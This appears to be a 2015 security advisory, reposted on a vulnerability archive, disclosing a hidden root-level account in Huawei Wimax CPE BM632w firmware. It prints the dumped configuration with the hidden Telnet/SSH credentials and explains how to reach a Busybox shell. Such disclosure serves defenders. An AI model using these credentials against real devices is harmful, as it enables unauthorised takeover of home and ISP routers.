Huawei Wimax CPE Bm632w Hidden Backdoor

2015.05.30
Credit: Koorosh Ghorbani
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Exploit Title : Huawei Wimax CPE Bm632w Hidden Backdoor Date : 30 May 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : http://www.huawei.com/ Platform : Hardware Tested On : Mobinnet : Huawei Wimax CPE bm632w Firmware Version: V100R001IRNC15B015 ________________________________________________________ binwalk result shows firmware have a xml configuration file , in this file there is a user with User Level = 0 , so it Means Super Admin because the admin has user level = 1 so , Huawei Wimax CPE BM632w upgrade firmware with version : V100R001IRNC15B015 Have hidden user with UserLevel = 0 which cant login with web panel but it has full ATP Access on Telnet and SSH. in ATP shell , after typing "shell" Command , Busybox shell will Appears . here is part of dumped xml file . <UserInterface> <X_Web Timeout="5" FirstLogin="1"> <UserInfo NumberOfInstances="2"> <UserInfoInstance InstanceID="1" Username="admin" Userpassword="admin" UserLevel="2"> <ObjExtention> <Userpassword HideBits="27"/> </ObjExtention> </UserInfoInstance> <UserInfoInstance InstanceID="2" Username="user" Userpassword="user" Userlevel="1"> <ObjExtention> <Userpassword HideBits="27"/> </ObjExtention> </UserInfoInstance> </UserInfo> </X_Web> <X_Cli> <UserInfo NumberOfInstances="1"> <UserInfoInstance InstanceID="1" Username="wimax" Userpassword="wimax820" Userlevel="0"/> </UserInfo> </X_Cli> </UserInterface>

References:

http://8thbit.net/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top